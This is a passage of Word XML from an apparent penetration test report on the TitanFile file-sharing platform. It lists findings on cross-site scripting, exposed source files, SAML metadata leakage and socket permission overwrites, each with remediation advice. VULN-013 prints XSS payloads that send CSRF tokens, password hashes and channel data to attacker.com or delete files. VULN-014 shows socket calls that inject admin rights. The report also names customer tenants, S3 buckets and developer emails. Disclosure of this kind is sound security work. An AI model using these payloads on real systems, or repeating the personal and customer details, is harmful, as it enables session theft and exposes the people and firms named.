          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Text-only mode (no html:true flag)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>html:true flag enables HTML rendering with user-controlled content</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Risk Assessment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Severity: HIGH (CVSS 7.0)</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Escape all error messages: utils.escapeHTML(error) before DOM insertion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Short-term</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5760"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Audit all TitanFile.alert() calls with { html: true } — replace with safe templating</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>CWE-79: Cross-site Scripting — https://cwe.mitre.org/data/definitions/79.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>VULN-011: Full Client-Side Application Source Code Publicly Exposed (46 Unbundled Files)</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6.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)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CWE-540 (Inclusion of Sensitive Information in Source Code)</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A05:2021 — Security Misconfiguration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https://app.titanfile.com/static/js/*.js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46 unbundled JavaScript/TypeScript/TSX source files</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The entire client-side JavaScript application is served as 46 raw, unbundled, fully commented source files. These files reveal all application routes (20+), 85+ Socket.IO events with data schemas, admin commands, permission model, WOPI token flow, file ID formats, integration details (Stripe, Zuora, DocuSign, NetDocs, Credeon), and developer email addresses. Build version 596 is exposed via cache buster query parameter.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Business Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>See Risk Summary Matrix — HIGH severity</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>CVSS 3.1: 6.5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Technical Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Files include: app.js, router.js, controller.js, utils.ts, socket.js, channels/views.js (6130 lines), channels/models.ts, admin/commands.js, settings/routes.tsx, ms365/host-action-dialog.tsx, users/models.js, files/models.js, views/previewer.js, views/credeon_password.js, and 32 more files.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Developer emails exposed: taa@titanfile.com, hathai@titanfile.com, hkanaan@titanfile.com, rgorrie@titanfile.com, mark@titanfile.com, vzvikaramba@titanfile.com, hathai@gmail.com (personal)</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curl -s -o /dev/null -w "%{http_code}" "https://app.titanfile.com/static/js/admin/commands.js"</w:t>
        <w:br/>
        <w:t>200</w:t>
        <w:br/>
        <w:t>$ curl -s -o /dev/null -w "%{http_code}" "https://app.titanfile.com/static/js/views/previewer.js"</w:t>
        <w:br/>
        <w:t>200</w:t>
        <w:br/>
        <w:t>$ curl -s -o /dev/null -w "%{http_code}" "https://app.titanfile.com/static/js/ms365/host-action-dialog.tsx"</w:t>
        <w:br/>
        <w:t>200</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>HTTP Evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
        </w:rPr>
        <w:t>$ curl -s -o /dev/null -w "%{http_code}" "https://app.titanfile.com/static/js/admin/commands.js"</w:t>
        <w:br/>
        <w:t>200</w:t>
        <w:br/>
        <w:t>$ curl -s -o /dev/null -w "%{http_code}" "https://app.titanfile.com/static/js/views/previewer.js"</w:t>
        <w:br/>
        <w:t>200</w:t>
        <w:br/>
        <w:t>$ curl -s -o /dev/null -w "%{http_code}" "https://app.titanfile.com/static/js/ms365/host-action-dialog.tsx"</w:t>
        <w:br/>
        <w:t>200</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JavaScript serving</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Bundled and minified production build</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Raw unbundled source files with full comments</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Risk Assessment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Severity: HIGH (CVSS 6.5)</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Bundle and minify JavaScript using webpack/vite/esbuild for production</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Remove source .js/.ts/.tsx files from /static/ directory</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Medium-term</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5760"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Use content-hash filenames instead of version query parameters</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>CWE-540: Inclusion of Sensitive Information in Source Code — https://cwe.mitre.org/data/definitions/540.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>VULN-012: SAML Service Provider Metadata Information Disclosure on Any Wildcard Subdomain</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7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)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CWE-200 (Exposure of Sensitive Information to an Unauthorized Actor)</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A01:2021 — Broken Access Control</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https://*.titanfile.com/saml2/metadata/</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SAML SP metadata endpoint</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SAML SP metadata is served on any wildcard subdomain, enabling tenant enumeration and infrastructure reconnaissance. The metadata reveals SP configuration, signing preferences, and contact information (app-support@titanfile.com). Customer-specific S3 bucket names (foley-common-upload, gowlingwlg-uploads, nsuarb-uploads, rbcbank-uploads) are leaked in CSP connect-src headers, confirming enterprise customers including law firms, banks, and government agencies.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Business Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>See Risk Summary Matrix — HIGH severity</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>CVSS 3.1: 7.5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Technical Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Confirmed tenants from CSP + branding:</w:t>
        <w:br/>
        <w:t>- gowlingwlgca.titanfile.com → Gowling WLG (Canada)</w:t>
        <w:br/>
        <w:t>- foley.titanfile.com → Foley &amp; Lardner</w:t>
        <w:br/>
        <w:t>- nsuarb.titanfile.com → NS Utility and Review Board</w:t>
        <w:br/>
        <w:t>- rbcbank.titanfile.com → RBC Bank</w:t>
        <w:br/>
        <w:br/>
        <w:t>S3 buckets in CSP: foley-common-upload.s3.amazonaws.com, gowlingwlg-uploads.s3.amazonaws.com, nsuarb-uploads.s3.amazonaws.com, rbcbank-uploads.s3.amazonaws.com</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curl -s "https://randomfake99.titanfile.com/saml2/metadata/" | head -5</w:t>
        <w:br/>
        <w:t>&lt;?xml version='1.0' encoding='UTF-8'?&gt;</w:t>
        <w:br/>
        <w:t>&lt;EntityDescriptor entityID="https://randomfake99.titanfile.com/saml2/metadata/" validUntil=""...&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>HTTP Evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
        </w:rPr>
        <w:t>$ curl -s "https://randomfake99.titanfile.com/saml2/metadata/" | head -5</w:t>
        <w:br/>
        <w:t>&lt;?xml version='1.0' encoding='UTF-8'?&gt;</w:t>
        <w:br/>
        <w:t>&lt;EntityDescriptor entityID="https://randomfake99.titanfile.com/saml2/metadata/" validUntil=""...&gt;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SAML metadata access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Only on configured tenant subdomains</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Any fabricated subdomain returns valid metadata</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>CSP headers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Generic S3 bucket names or CloudFront URLs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Customer-specific bucket names revealing enterprise clients</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Risk Assessment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Severity: HIGH (CVSS 7.5)</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Return 404 for SAML metadata on unconfigured subdomains</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Replace customer S3 bucket names in CSP with CloudFront distributions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>CWE-200: Exposure of Sensitive Information — https://cwe.mitre.org/data/definitions/200.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>VULN-013: Stored Cross-Site Scripting via Unsanitized File Preview HTML Injection (Standalone)</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7.6 (AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N)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CWE-79 (Improper Neutralization of Input During Web Page Generation)</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A03:2021 — Injection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https://app.titanfile.com/static/js/views/previewer.js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File preview rendering engine — onRender() method</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Independent of the OAuth account takeover chain (VULN-001), the file previewer's .html() sink is a standalone Stored XSS vulnerability. Any attacker who shares a file with a victim can execute arbitrary JavaScript in the victim's authenticated session when the file is previewed. This alone enables session data theft, CSRF token exfiltration, channel enumeration, file deletion, and data exfiltration via the 85+ Socket.IO events available in the authenticated context.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Business Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>See Risk Summary Matrix — HIGH severity</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>CVSS 3.1: 7.6</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Technical Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>// views/previewer.js (Line 21)</w:t>
        <w:br/>
        <w:t>onRender: function () {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  this.$('#previewer').html(this.options.html);  // Direct HTML injection</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>CSP on authenticated pages: unsafe-inline + unsafe-eval = zero mitigation.</w:t>
        <w:br/>
        <w:t>No DOMPurify, no iframe sandboxing, no output encoding.</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&lt;!-- Steal CSRF token --&gt;</w:t>
        <w:br/>
        <w:t>&lt;img src=x onerror="fetch('https://attacker.com/log?csrf='+djangoVars.csrfToken)"&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t>&lt;!-- Steal Credeon password hash --&gt;</w:t>
        <w:br/>
        <w:t>&lt;img src=x onerror="fetch('https://attacker.com/log?hash='+TitanFile.credeonpw)"&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t>&lt;!-- Enumerate all channels --&gt;</w:t>
        <w:br/>
        <w:t>&lt;img src=x onerror="socket.emit('channels:search',{query:'*',paginate_by:100,search_in:'all'},</w:t>
        <w:br/>
        <w:t xml:space="preserve">  function(e,d){fetch('https://attacker.com/exfil',{method:'POST',body:JSON.stringify(d)})})"&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t>&lt;!-- Delete files --&gt;</w:t>
        <w:br/>
        <w:t>&lt;img src=x onerror="socket.emit('channels:deletefiles',{channel:'TARGET',ids:['fr_UUID']})"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>HTTP Evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
        </w:rPr>
        <w:t>&lt;!-- Steal CSRF token --&gt;</w:t>
        <w:br/>
        <w:t>&lt;img src=x onerror="fetch('https://attacker.com/log?csrf='+djangoVars.csrfToken)"&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t>&lt;!-- Steal Credeon password hash --&gt;</w:t>
        <w:br/>
        <w:t>&lt;img src=x onerror="fetch('https://attacker.com/log?hash='+TitanFile.credeonpw)"&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t>&lt;!-- Enumerate all channels --&gt;</w:t>
        <w:br/>
        <w:t>&lt;img src=x onerror="socket.emit('channels:search',{query:'*',paginate_by:100,search_in:'all'},</w:t>
        <w:br/>
        <w:t xml:space="preserve">  function(e,d){fetch('https://attacker.com/exfil',{method:'POST',body:JSON.stringify(d)})})"&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t>&lt;!-- Delete files --&gt;</w:t>
        <w:br/>
        <w:t>&lt;img src=x onerror="socket.emit('channels:deletefiles',{channel:'TARGET',ids:['fr_UUID']})"&gt;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File preview rendering</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Sanitized via DOMPurify or rendered in sandboxed iframe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Raw HTML injected via .html() with no sanitization</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Risk Assessment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Severity: HIGH (CVSS 7.6)</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Use DOMPurify: this.$('#previewer').html(DOMPurify.sanitize(this.options.html))</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Short-term</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5760"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Render previews in sandboxed &lt;iframe sandbox="allow-same-origin"&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>CWE-79 — https://cwe.mitre.org/data/definitions/79.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery .html() Security Risks — https://api.jquery.com/html/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>VULN-014: Socket.IO Event Handlers Blindly Overwrite User Permissions and Configuration (Standalone)</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7.5 (AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N)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CWE-269 (Improper Privilege Management), CWE-20 (Improper Input Validation)</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A01:2021 — Broken Access Control</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admin/commands.js, users/models.js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WebSocket event handlers for permission and configuration updates</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Independent of the CSWSH chain (VULN-002), three separate socket event handlers accept and apply permission/configuration data without validation: (1) permissions:update_perm_cache overwrites the permission cache, (2) user:updateuserconfiguration overwrites any user attribute including is_admin, (3) user:updatesubconfiguration merges data into subscription config via Object.assign. Any vector allowing socket event injection (XSS, compromised extensions, MITM) can exploit these handlers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Business Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>See Risk Summary Matrix — HIGH severity</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>CVSS 3.1: 7.5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Technical Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>// admin/commands.js (Lines 102-110)</w:t>
        <w:br/>
        <w:t>permissionsChanged: function (data) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const perms = new Set(data.permissions)</w:t>
        <w:br/>
        <w:t xml:space="preserve">  TitanFile.user.set('permissions', perms);</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>// users/models.js (Lines 218-220)</w:t>
        <w:br/>
        <w:t>updateUserConfigs: function (data) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  for (const key in data) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    TitanFile.user.set(key, data[key][1])</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>// users/models.js (Lines 193-208)</w:t>
        <w:br/>
        <w:t>updateSubConfigs: function (data) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const sub = this.get('subscription');</w:t>
        <w:br/>
        <w:t xml:space="preserve">  Object.assign(sub, updatedConfigs);</w:t>
        <w:br/>
        <w:t>}</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 Inject admin permissions:</w:t>
        <w:br/>
        <w:t>socket.emit('permissions:update_perm_cache', {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  permissions: ['tf_permissions.tf_admin',</w:t>
        <w:br/>
        <w:t xml:space="preserve">    'tf_permissions.tf_manage_users',</w:t>
        <w:br/>
        <w:t xml:space="preserve">    'tf_permissions.tf_impersonate_users']</w:t>
        <w:br/>
        <w:t>});</w:t>
        <w:br/>
        <w:br/>
        <w:t>// Set is_admin via config update:</w:t>
        <w:br/>
        <w:t>socket.emit('user:updateuserconfiguration', {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  is_admin: [null, true]</w:t>
        <w:br/>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>HTTP Evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
        </w:rPr>
        <w:t>// Inject admin permissions:</w:t>
